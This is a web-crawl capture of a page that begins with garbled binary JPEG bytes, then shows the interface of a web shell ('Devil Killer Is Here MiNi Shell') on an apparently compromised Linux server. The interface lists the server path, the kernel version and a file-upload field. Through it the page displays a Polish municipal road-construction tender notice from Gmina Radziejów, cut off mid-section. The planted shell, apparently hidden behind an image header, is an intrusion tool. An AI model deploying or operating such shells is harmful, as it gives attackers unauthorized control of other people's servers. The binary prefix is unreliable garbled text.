JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230425/0019152701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Przebudowa dróg gminnych na terenie gminy Radziejów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RADZIEJÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 910866672</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 20/22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radziejów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">88-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL619 - Włocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0542853686</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@ugradziejow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.ugradziejow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Przebudowa dróg gminnych na terenie gminy Radziejów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3553fa11-de96-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00191527</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-25</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00055874/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Przebudowa dróg gminnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ugradziejow.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ugradziejow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta powinna zostać sporządzona w języku polskim i złożona, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>2. Instrukcja złożenia oferty środkiem komunikacji elektronicznej w niniejszym postępowaniu: Aby móc złożyć ofertę w postępowaniu należy zarejestrować konto na Platformie przetargowej https://ugradziejow.logintrade.net/rejestracja/ustawowe.html<br/>Pola oznaczone symbolem * (gwiazdki) są kluczowe w procesie rejestracji i ich uzupełnienie jest obowiązkowe.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ugradziejow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, (Dz. Urz. UE L 119 z 04.05.2016), zwanego jako ,,RODO&#34;, udostępniam klauzulę informacyjną:<br/>Administratorem Państwa danych osobowych będzie Wójt Gminy Radziejów. Można się z nim kontaktować w następujący sposób:<br/>1. listownie na adres siedziby: 88-200 Radziejów ul. Kościuszki 20/22<br/>2. e-mailowo: info@ugradziejow.pl<br/>3. telefonicznie: 54 285 36 86<br/>Do kontaktów w sprawie ochrony danych osobowych został także powołany inspektor ochrony danych, z którym można się<br/>kontaktować wysyłając e-mail na adres m.lochocki@jumi2012.pl<br/>1. Państwa dane osobowe przetwarzane będą na podstawie:<br/>1) art. 6 ust. 1 lit c), art. 9 ust. 2 lit. g) i art. 10 RODO, w związku z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych i<br/>regulaminem udzielania zamówień publicznych w celu realizacji obowiązku prawnego ciążącego na administratorze<br/>tj. udzielenia zamówienia publicznego, w trybie art. 275 ust. 2 ustawy.<br/>2) art. 6 ust. 1 lit b) RODO, w związku z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych i regulaminem udzielania<br/>zamówień publicznych w celu wykonania umowy, której stroną jest osoba, której dane dotyczą tj. zawarcie odpłatnej umowy<br/>zawieranej między zamawiającym a wykonawcą, której przedmiotem jest usługa, dostawa lub robota budowlana (też umowa o<br/>podwykonawstwo), w tym wypadku zadanie pn. „Przebudowa dróg gminnych na terenie gminy Radziejów ”,<br/>3) art. 6 ust. 1 lit a RODO na podstawie zgody. Zgoda jest wymagana, gdy uprawnienie do przetwarzania danych osobowych nie<br/>wynika wprost z przepisów prawa, a przekażą Państwo administratorowi z własnej inicjatywy więcej danych niż jest to konieczne dla<br/>załatwienia sprawy (tzw. działanie wyraźnie potwierdzające) np. podanie nr telefonu, adresu e-mail i inne.<br/>2. Państwa dane osobowe możemy ujawniać, przekazywać i udostępniać wyłącznie podmiotom uprawnionym na podstawie<br/>obowiązujących przepisów prawa. Są nimi m.in. wykonawcy, podmioty świadczące usługi pocztowe, bankowe, telekomunikacyjne<br/>oraz inne podmioty, gdy wystąpią z takim żądaniem, oczywiście w oparciu o stosowną podstawę prawną. Twoje dane osobowe<br/>możemy także przekazywać pracownikom oraz współpracownikom administratora, podmiotom, które przetwarzają je na zlecenie<br/>administratora tzw. podmiotom przetwarzającym, są nimi m.in. podmioty świadczące usługi informatyczne i inne, jednakże<br/>przekazanie Państwa danych nastąpić może tylko wtedy, gdy zapewnią one odpowiednią ochronę Państwa praw.<br/>3. Państwa dane osobowe przetwarzane będą do czasu istnienia podstawy do ich przetwarzania, w tym również przez okres<br/>przewidziany w przepisach dotyczących przechowywania i archiwizacji dokumentacji, i tak:<br/>1) przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego,<br/>2) jeżeli czas trwania umowy przekracza 4 lata, przez czas trwania umowy, do czasu przedawnienia roszczeń,<br/>3) w zakresie danych, gdzie wyrazili Państwo zgodę na ich przetwarzanie, do czasu cofnięcia zgody, nie dłużej jednak niż do czasu<br/>wskazanego w pkt 1.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. W związku z przetwarzaniem danych osobowych przez Administratora mają Państwo prawo do:<br/>1) dostępu do treści danych, jednakże jeżeli spełnienie obowiązku prawa dostępu do danych osobie, której dane dotyczą,<br/>wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu,<br/>2) sprostowania danych,<br/>3) usunięcia danych, jeżeli:<br/>a) wycofają zgodę na przetwarzanie danych osobowych,<br/>b) dane osobowe przestaną być niezbędne do celów, dla których zostały zebrane lub dla których były przetwarzane,<br/>c) dane są przetwarzane niezgodnie z prawem.<br/>4) ograniczenia przetwarzania danych, jeżeli:<br/>a) osoba, której dane dotyczą, kwestionuje prawidłowość danych osobowych,<br/>b) przetwarzanie jest niezgodne z prawem, a osoba, której dane dotyczą, sprzeciwia się usunięciu danych osobowych, żądając w<br/>zamian ograniczenia ich wykorzystywania,<br/>c) administrator nie potrzebuje już danych osobowych do celów przetwarzania, ale są one potrzebne osobie, której dane dotyczą, do<br/>ustalenia, dochodzenia lub obrony roszczeń,<br/>d) osoba, której dane dotyczą, wniosła sprzeciw wobec przetwarzania – do czasu stwierdzenia, czy prawnie uzasadnione podstawy<br/>po stronie administratora są nadrzędne wobec podstaw sprzeciwu osoby, której dane dotyczą. Wystąpienie osoby z żądaniem<br/>ograniczenia przetwarzania danych nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o<br/>udzielenie zamówienia publicznego lub konkursu.<br/>5) cofnięcia zgody w dowolnym momencie. Cofnięcie zgody nie wpływa na przetwarzanie danych dokonywane przez administratora<br/>przed jej cofnięciem.<br/>2. Podanie Państwa danych:<br/>1) jest wymogiem ustawy na podstawie, których działa administrator. Jeżeli odmówią Państwo podania Twoich danych lub podadzą<br/>nieprawidłowe dane, administrator nie będzie mógł zrealizować celu do jakiego zobowiązują go przepisy prawa,<br/>2) jest wymogiem umownym. Jeżeli nie podadzą nam Państwo swoich danych osobowych, nie będziemy mogli podpisać i realizować<br/>z Państwem umowy,<br/>3) jest dobrowolne w zakresie zgody, która może być cofnięta w dowolnym momencie.<br/>3. Przysługuje Państwu także skarga do organu nadzorczego – Prezesa Urzędu Ochrony Danych Osobowych – Warszawa, ul.<br/>Stawki 2, gdy uznają Państwo, iż przetwarzanie Państwa danych osobowych narusza przepisy ogólnego rozporządzenia o ochronie<br/>danych osobowych z dnia 27 kwietnia 2016 r.<br/>4. Dane nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym również w formie profilowania.<br/>5. Administrator nie przekazuje danych osobowych do państwa trzeciego lub organizacji międzynarodowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – Droga nr 180427 C Kwilno-Płowce II w miejscowości Płowce II od km 0+006,94 do km 0+501,94, w tym remont nawierzchni skrzyżowania drogi krajowej DK 62 z drogą gminną nr 180427C na długości 6,94 mb.<br/>1.	W ramach przebudowy drogi gminnej:<br/>-wykonanie rozbiórek istniejących elementów drogowych – konstrukcji istniejącej jezdni i poboczy, <br/>-wykonanie robót ziemnych,<br/>-wykonanie nowych warstw konstrukcyjnych - podbudowy,<br/>-wykonanie nawierzchni bitumicznej jezdni,<br/>-wykonanie poboczy,<br/>-wykonanie stałej organizacji ruchu – wg. odrębnego opracowania branżowego,<br/>-wykonanie wycinek drzew i krzewów kolidujących z projektowanym zagospodarowaniem – wg. odrębnego zezwolenia,<br/>-uporządkowanie terenu po robotach budowlanych<br/>Przyjęto następujące założenia projektowe:<br/>-klasa ulicy D,<br/>-prędkość projektowa 50 km/h <br/>-szerokość jezdni:<br/>a) 5,0 m od km 0+006,94 do km 0+020,00 <br/>b)od 5,0 m do 4,0 m od km 0+020,00 do km 0+032,00<br/>c)4,0 m od km 0+032,00 do km 0+501,94 <br/>- pobocza szerokości 0,75 m<br/>Konstrukcja nawierzchni jezdni:<br/>-Warstwa ścieralna z betonu asfaltowego AC11S 50/70 gr. 5 cm	<br/>-Górna warstwa podbudowy z kruszywa łamanego (KŁSM) 0/31,5 gr. 8 cm (sienit)<br/>-Dolna warstwa podbudowy z kruszywa łamanego KŁSM 0/63,0 gr. 12 cm (sienit)<br/>-Warstwa odcinająca z piasku gr. 10 cm<br/>-Warstwa stabilizacji Rm=1,5 MPa gr. 10 cm<br/>-Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>-Grubość konstrukcji nawierzchni 45 cm<br/>Konstrukcja nawierzchni poboczy:<br/>-Nawierzchni z kruszywa łamanego (KŁSM) 0/31,5 gr. 12 cm (sienit)<br/>-Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>-Grubość konstrukcji nawierzchni 12 cm<br/>2.	W ramach remontu nawierzchni skrzyżowania drogi krajowej DK 62 z droga gminną:<br/>Konstrukcja nawierzchni jezdni (drogi gminnej w obrębie skrzyżowania):<br/>-Warstwa ścieralna z betonu asfaltowego AC11S 50/70 gr. 4 cm<br/>-Warstwa wiążąca z betonu asfaltowego AC16W 50/70 gr. 5 cm	<br/>-Górna warstwa podbudowy z kruszywa łamanego (KŁSM) 0/31,5 gr. 8 cm (sienit)<br/>-Dolna warstwa podbudowy z kruszywa łamanego KŁSM 0/63,0 gr. 12 cm (sienit)<br/>-Warstwa odcinająca z piasku gr. 10 cm<br/>-Warstwa stabilizacji Rm=1,5 MPa gr. 10 cm<br/>-Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>-Grubość konstrukcji nawierzchni 49 cm<br/>Konstrukcja nawierzchni poboczy:<br/>-Nawierzchni z kruszywa łamanego (KŁSM) 0/31,5 gr. 12 cm (sienit)<br/>-Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>-Grubość konstrukcji nawierzchni 12 cm </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233225-2 - Roboty budowlane w zakresie dróg jednopasmowych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">44113810-6 - Wykończenia nawierzchni</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nieodrzuconych na podstawie kryteriów oceny ofert określonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – Droga nr 180438 C Przemystka-Biskupice w miejscowości Biskupice od km 0+450,00 do km 0+991,45 na długości 541,45 mb, w tym remont nawiewrzchni skrzyżowania drogi wojewódzkiej DW 266 z drogą gminną nr 180427 C na długości 9,00 mb<br/>1.	W ramach przebudowy drogi gminnej:<br/>- wykonanie rozbiórek istniejących elementów drogowych – konstrukcji istniejącej jezdni i poboczy, <br/>- wykonanie robót ziemnych,<br/>- wykonanie nowych warstw konstrukcyjnych - podbudowy,<br/>- wykonanie nawierzchni bitumicznej jezdni,<br/>- wykonanie poboczy,<br/>- wykonanie stałej organizacji ruchu – wg. odrębnego opracowania branżowego,<br/>- uporządkowanie terenu po robotach budowlanych.<br/>Przyjęto następujące założenia projektowe:<br/>- klasa ulicy D,<br/>- prędkość projektowa 50 km/h <br/>- szerokość jezdni:<br/>- 3,5 m od km 0+450,00 do km 0+968,44<br/>- od 3,5 m do 5,0 m od km 0+968,44 do km 0+980,44<br/>- 5,0 m od km 0+980,44 do km 0+991,45 <br/>- pobocza szerokości 0,75 m z lokalnymi przewężeniami do 0,5m<br/>Konstrukcja nawierzchni jezdni:<br/>- Warstwa ścieralna z betonu asfaltowego AC11S 50/70 gr. 5 cm	<br/>- Górna warstwa podbudowy z kruszywa łamanego (KŁSM) 0/31,5 gr. 8 cm (sienit)<br/>- Dolna warstwa podbudowy z kruszywa łamanego KŁSM 0/63,0 gr. 12 cm (sienit)<br/>- Warstwa odcinająca z piasku gr. 10 cm<br/>- Warstwa stabilizacji Rm=1,5 MPa gr. 10 cm<br/>- Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>- Grubość konstrukcji nawierzchni 45 cm<br/>Konstrukcja nawierzchni poboczy:<br/>- Nawierzchni z kruszywa łamanego (KŁSM) 0/31,5 gr. 12 cm (sienit)<br/>- Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>- Grubość konstrukcji nawierzchni 12 cm<br/>2.	W ramach remontu nawierzchni skrzyżowania drogi wojewódzkiej DW 266 z drogą gminną:<br/>Konstrukcja nawierzchni jezdni (drogi gminnej w obrębie skrzyżowania):<br/>- Warstwa ścieralna z betonu asfaltowego AC11S 50/70 gr. 4 cm<br/>- Warstwa wiążąca z betonu asfaltowego AC16W 50/70 gr. 5 cm	<br/>- Górna warstwa podbudowy z kruszywa łamanego (KŁSM) 0/31,5 gr. 8 cm (sienit)<br/>- Dolna warstwa podbudowy z kruszywa łamanego KŁSM 0/63,0 gr. 12 cm (sienit)<br/>- Warstwa odcinająca z piasku gr. 10 cm<br/>- Warstwa stabilizacji Rm=1,5 MPa gr. 10 cm<br/>- Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>- Grubość konstrukcji nawierzchni 49 cm<br/>Konstrukcja nawierzchni poboczy:<br/>- Nawierzchni z kruszywa łamanego (KŁSM) 0/31,5 gr. 12 cm (sienit)<br/>- Sprofilowane, zagęszczone podłoże gruntowe Wx≥1,0<br/>- Grubość konstrukcji nawierzchni 12 cm </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233225-2 - Roboty budowlane w zakresie dróg jednopasmowych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">44113810-6 - Wykończenia nawierzchni</p> <p class="mb-0">45233250-6 - Roboty w zakresie nawierzchni, z wyjątkiem dróg</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze ofertę najkorzystniejszą spośród ofert nieodrzuconych na podstawie kryteriów oceny ofert określonych w SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa 